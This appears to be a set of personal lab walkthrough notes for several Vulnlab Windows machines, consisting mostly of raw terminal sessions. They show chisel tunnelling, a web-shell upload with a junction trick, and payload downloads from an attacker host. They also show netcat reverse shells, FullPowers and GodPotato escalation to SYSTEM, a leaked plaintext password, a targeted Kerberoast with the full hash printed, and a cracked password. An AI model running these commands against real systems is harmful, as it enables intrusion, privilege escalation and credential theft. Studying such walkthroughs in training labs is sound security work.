Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload chisel.exe
                                        
Info: Uploading /home/puck/vulnlab/sendai/chisel.exe to C:\temp\chisel.exe
                                        
Data: 12008104 bytes of 12008104 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\temp> ./chisel.exe client 10.8.2.138:8001 R:1080:socks
chisel.exe : 2024/06/14 05:24:26 client: Connecting to ws://10.8.2.138:8001
    + CategoryInfo          : NotSpecified: (2024/06/14 05:2...10.8.2.138:8001:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2024/06/14 05:24:26 client: Connected (Latency 20.3373ms)

work in progress

as chisel is working fine

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains curl http://127.0.0.1     
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  127.0.0.1:80  ...  OK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
    color:#000000;
    background-color:#0072C6;
    margin:0;
}

#container {
    margin-left:auto;
    margin-right:auto;
    text-align:center;
    }

a img {
    border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>                                                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ 

someting must be wrong with my impacket-mssqlclient Encryption required, switching to TLS

 

vulnlab-media

vulnlab media

a medium Windows machine

Tools used : ntlm_theft , fullpowers.exe , godpotato.exe

1st upload a video file ,catch the hash with Responder, and crack it with John

then ssh into the box

examine index.php , and query ApacheServer for a clue what todo

PS C:\xampp\htdocs> reg query "HKLM\SYSTEM\CurrentControlSet\services\ApacheHTTPServer"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer
    Type    REG_DWORD    0x10
    Start    REG_DWORD    0x2
    ErrorControl    REG_DWORD    0x1
    ImagePath    REG_EXPAND_SZ    "C:\Xampp\apache\bin\httpd.exe" -k runservice
    DisplayName    REG_SZ    Apache HTTP Server
    DependOnService    REG_MULTI_SZ    Tcpip\0Afd
    ObjectName    REG_SZ    NT AUTHORITY\Local Service
    Description    REG_SZ    Apache/2.4.56 (Win64)
    FailureActions    REG_BINARY    0000000000000000000000000300000014000000010000001400000001000000140000000100000014000000
    RequiredPrivileges    REG_MULTI_SZ    SeChangeNotifyPrivilege\0SeCreateGlobalPrivilege\0SeIncreaseWorkingSetPrivilege\0SeTcbPrivilege\0SeTimeZonePrivilege

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer\Parameters
PS C:\xampp\htdocs> cat index.php                                                                                    
<?php
error_reporting(0);

    // Your PHP code for handling form submission and file upload goes here.
    $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
        $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
        $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
        $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

        // Create the full upload directory path
        $targetDir = $uploadDir . $folderName . '/';

        // Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
        }

        // Sanitize the filename to remove unsafe characters
        $originalFilename = $_FILES["fileToUpload"]["name"];
        $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);


        // Build the full path to the target file
        $targetFile = $targetDir . $sanitizedFilename;

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
            echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

 

make everything ready as below

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ ssh enox@media.vl
enox@media.vl's password: 

Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

enox@MEDIA C:\Users\enox>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

enox@MEDIA C:\Users\enox>cd cd:\xamp
The filename, directory name, or volume label syntax is incorrect.

enox@MEDIA C:\Users\enox>cd c:\

enox@MEDIA c:\>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\

05/08/2021  01:20 AM    <DIR>          PerfLogs
10/10/2023  06:32 AM    <DIR>          Program Files
05/08/2021  02:40 AM    <DIR>          Program Files (x86)
10/02/2023  10:26 AM    <DIR>          Users
10/10/2023  06:41 AM    <DIR>          Windows
10/02/2023  11:03 AM    <DIR>          xampp
               0 File(s)              0 bytes
               6 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\>cd xampp

enox@MEDIA c:\xampp>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp

10/02/2023  11:03 AM    <DIR>          .
10/02/2023  10:57 AM    <DIR>          apache
06/07/2013  11:15 AM               436 apache_start.bat
10/01/2019  07:13 AM               190 apache_stop.bat
04/05/2021  04:16 PM            10,324 catalina_service.bat
04/05/2021  04:17 PM             3,766 catalina_start.bat
04/05/2021  04:17 PM             3,529 catalina_stop.bat
10/02/2023  10:57 AM    <DIR>          cgi-bin
10/02/2023  10:57 AM    <DIR>          contrib
10/02/2023  10:57 AM    <DIR>          FileZillaFTP
10/02/2023  10:27 AM    <DIR>          htdocs
10/02/2023  10:57 AM    <DIR>          install
10/02/2023  10:57 AM    <DIR>          licenses
10/02/2023  10:57 AM    <DIR>          locale
10/02/2023  10:57 AM    <DIR>          MercuryMail
10/02/2023  10:57 AM    <DIR>          mysql
06/03/2019  11:39 AM               471 mysql_start.bat
10/01/2019  07:13 AM               270 mysql_stop.bat
03/13/2017  11:04 AM               824 passwords.txt
10/02/2023  10:58 AM    <DIR>          perl
10/02/2023  11:01 AM    <DIR>          php
10/02/2023  11:03 AM    <DIR>          phpMyAdmin
04/06/2023  09:04 AM             7,653 readme_de.txt
04/06/2023  09:04 AM             7,515 readme_en.txt
10/02/2023  11:03 AM    <DIR>          sendmail
11/12/2015  05:13 PM               370 setup_xampp.bat
11/29/2020  02:38 PM             1,671 test_php.bat
06/13/2024  06:46 AM    <DIR>          tmp
10/02/2023  11:03 AM    <DIR>          tomcat
10/02/2023  11:03 AM    <DIR>          webalizer
10/02/2023  11:03 AM    <DIR>          webdav
04/06/2021  11:38 AM         3,368,448 xampp-control.exe
04/05/2021  04:08 PM               978 xampp-control.ini
03/30/2013  12:29 PM           118,784 xampp_start.exe
03/30/2013  12:29 PM           118,784 xampp_stop.exe
              16 File(s)      3,644,013 bytes
              19 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\xampp>cd htdocs

enox@MEDIA c:\xampp\htdocs>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp\htdocs

10/02/2023  10:27 AM    <DIR>          .
10/02/2023  11:03 AM    <DIR>          ..
10/02/2023  10:27 AM    <DIR>          assets
10/02/2023  10:27 AM    <DIR>          css
10/10/2023  05:00 AM            20,563 index.php
10/02/2023  10:27 AM    <DIR>          js
               1 File(s)         20,563 bytes
               5 Dir(s)   8,501,620,736 bytes free

enox@MEDIA c:\xampp\htdocs>cd C:\Windows\Tasks\Uploads\

enox@MEDIA C:\Windows\Tasks\Uploads>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads

06/13/2024  06:46 AM    <DIR>          .
10/02/2023  11:04 AM    <DIR>          ..
06/13/2024  06:46 AM    <DIR>          1bad4a5f2408292f03b2bfc5a1edd51d
06/13/2024  06:46 AM                 0 todo.txt
               1 File(s)              0 bytes
               3 Dir(s)   8,501,604,352 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d
The directory is not empty.

enox@MEDIA C:\Windows\Tasks\Uploads>cd 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d

06/13/2024  06:46 AM    <DIR>          .
06/13/2024  06:46 AM    <DIR>          ..
06/13/2024  06:46 AM                37 shell.php
               1 File(s)             37 bytes
               2 Dir(s)   8,499,552,256 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>del *.*   
           C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d\*.*, Are you sure (Y/N)? y                                                                                                                                                      enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>cd ..                                           

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads>cd C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mklink /J C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d C:\xampp\htdocs
Junction created for C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d <<===>> C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mkdir c:\temp

enox@MEDIA C:\xampp\htdocs>cd c:\temp

enox@MEDIA c:\temp> powershell                                      
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  iwr http://10.8.2.138/nc64.exe -outfile nc64.exe
PS C:\temp>  iwr http://10.8.2.138/FullPowers.exe -outfile FullPowers.exe 
PS C:\temp> iwr http://10.8.2.138/GodPotato.exe -outfile gp.exe

upload the shell.php again ( with same name ) on the website http://media.vl

trigger the shell

──(puck㉿kali)-[~/vulnlab/media]
└─$ curl http://media.vl/shell.php?cmd=c:\\temp\\nc64.exe+-e+cmd.exe+10.8.2.138+443

.

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50353
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State   
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled 
SeCreateGlobalPrivilege       Create global objects               Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled


C:\xampp\htdocs>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> ./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
[+] Started dummy thread with id 4104
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
PS C:\temp> 

having another listening running

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50388
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-87-343222087-845000640-1675840783-1352364494-2876961185                                    Enabled by default, Enabled group, Group owner    
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled


C:\Windows\system32>cd c:\temp 
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
 .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140703281709056
[*] DispatchTable: 0x140703284300104
[*] UseProtseqFunction: 0x140703283594576
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\4fd8aaea-891f-4482-ad8b-475ee0150221\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004c02-0f7c-ffff-c191-3eab1219bded
[*] DCOM obj OXID: 0xd4bc6315c97087dc
[*] DCOM obj OID: 0x8e7f990db6fe9b40
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 904 Token:0x740  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5052


and having again another listener running

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50461
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

C:\temp>hostname
hostname
MEDIA

C:\temp>

That’s it

Tools used on this box:

GodPotato

FullPowers

ntlm_theft

 

 

.

 

vulnlab-delegate

vulnlab-delegate

a hard machine

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000                   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1484473093-3449528695-2030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)
501: DELEGATE\Guest (SidTypeUser)
502: DELEGATE\krbtgt (SidTypeUser)
512: DELEGATE\Domain Admins (SidTypeGroup)
513: DELEGATE\Domain Users (SidTypeGroup)
514: DELEGATE\Domain Guests (SidTypeGroup)
515: DELEGATE\Domain Computers (SidTypeGroup)
516: DELEGATE\Domain Controllers (SidTypeGroup)
517: DELEGATE\Cert Publishers (SidTypeAlias)
518: DELEGATE\Schema Admins (SidTypeGroup)
519: DELEGATE\Enterprise Admins (SidTypeGroup)
520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
525: DELEGATE\Protected Users (SidTypeGroup)
526: DELEGATE\Key Admins (SidTypeGroup)
527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
1000: DELEGATE\DC1$ (SidTypeUser)
1101: DELEGATE\DnsAdmins (SidTypeAlias)
1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
1104: DELEGATE\A.Briggs (SidTypeUser)
1105: DELEGATE\b.Brown (SidTypeUser)
1106: DELEGATE\R.Cooper (SidTypeUser)
1107: DELEGATE\J.Roberts (SidTypeUser)
1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)
                                          

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck             
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Sep  9 09:52:30 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  delegate.vl                        Dr        0  Sat Aug 26 05:39:25 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
  .                                   D        0  Sat Aug 26 05:45:45 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  DfsrPrivate                      DHSr        0  Sat Aug 26 05:45:45 2023
  Policies                            D        0  Sat Aug 26 05:39:30 2023
  scripts                             D        0  Sat Aug 26 08:45:24 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
  .                                   D        0  Sat Aug 26 08:45:24 2023
  ..                                  D        0  Sat Aug 26 05:45:45 2023
  users.bat                           A      159  Sat Aug 26 08:54:29 2023

        5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\> 


┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cat users.bat 
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123

Bloodhound to get more info

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169      
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 07S

Upload data to Bloodhound, we find

The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

A targeted kerberoast attack can be performed using targetedKerberoast.py.

targetedKerberoast.py -v -d ‘domain.local’ -u ‘controlledUser’ -p ‘ItsPassword’
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd targetedKerberoast                                         
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls                       
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
  Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
--snip---
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$2b53511a3c352538045977f5360dfca5bee63e4aa8642cdb9b3f09704ba8eaeef308c38669d23a3f3ba0f374981ae0c77ecddc68af4ac7fe35a3263f3171c4a9161d04c724be976653e9d02492946aa2ad04db3701bceabd2ec47c22949832fe4b94b4e38ca9fec1f93b42780cfc1b30b3c3136595be8f3087139da24876015e017dc5134683647a328496682b1129496ead62ab751f977c58e38599d7fdddce58c76e0054356b06eed9aebecc586e9e2481fa59bf2449b441185fca2c04e5f9f4feeaa0f3520d0193d7478d9fd64ca2e7a23792542765faef51f96ce15e1520b52560a70dc771b97bb3ccb5a1c1f52656e81ea82aa178ba820100cb51a256d5b58771b8653392c8746067729de122f346cc6a12716fa3e45c9ac842c3937313abf104b30aa1224c9aff9816bcf166cae6835a5dda97e3bc7d0d05074bc08c7a1659b6eb577a5a1bdca341c1f80dc438a2d6eea7ff511192dc624248911f392cb776ab76ba723196a322129018fd4458eebcabb425e1fdfdba0a4e2cf0541bef6f43fd6be6cf921acb019d334a2317a3892cfe893a2c1d9fa279272d61ab540a2058102d5fc4c205f70e9a06346de822169ade4b5c7229961142af8ef517f4361559ca16f46cdf214428fe685d6ff76e53ccd7108e03f552974de9a1656c0afcd25bce077ad6ac379ddcee504556821e895f911ed6b8db0356a39f865863fc8458f48d78a1c266715e388c2577b98081e16662594a44e1736f6d37f336b1932ef0752bcfa46f22b70199af44aaa7500b5179fd028afd41c371ed0f3aa7fb982769fb12d89dee3861c595eca50954a1c4cb6652327cc1ab29de1a7858b6c865542a1ad9bfdfb0bb9408f0b1496170e966729b2fadeb07a3f67931558bc42dda3efc556877fb2661a5f4e3bb69ca1aa771d5e692572337c8fc9251edc4f6ddf8cbfaba280e562735e3d95cef97daf397e1df170d211798e2619807fb75c89de3ea8a53ec69f276eeb0e95190b39d3f96a4c08a196149268dae0db766d71b4f22411312f4766f683d0b2f64a1bf1443d302f9bf7fb5b1058aff75327a3f771a261e45f60b904c562f88c2b6261692ccca2e04b0381a9a92c7a0eb0bc0d0aec7f5b26a1ffb374cd4651a7a2f12ffa9672386c0dae6148e1f5fdfa01cc005bed67c28a1f047324bb0e650abff3c3cd727542bc5a83b234b4c7c17fa354fa55e58da3d475fa35bd4ea865bc2eb70d5f9b00b6b386169483c5020172862eded630c5088f7ee121c2e8bc75852770aefe68eadbdffa7268c87af0a6703951b65dfc60a47a063275288c5ebb0bb3524a3fa06bcd5ac1372addd9625a1b61f49160c266dd6b09ad146ec56f56bed4eccee9f37220ff9c6b25134f2f7d0cecfe20feec300b1932af55b00a71f4ac3eedc818e422fb28b65bfd5e207a86b8b358e775102c2421e27072a
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ 

....

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt      
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
KALEB_2341       (?)     
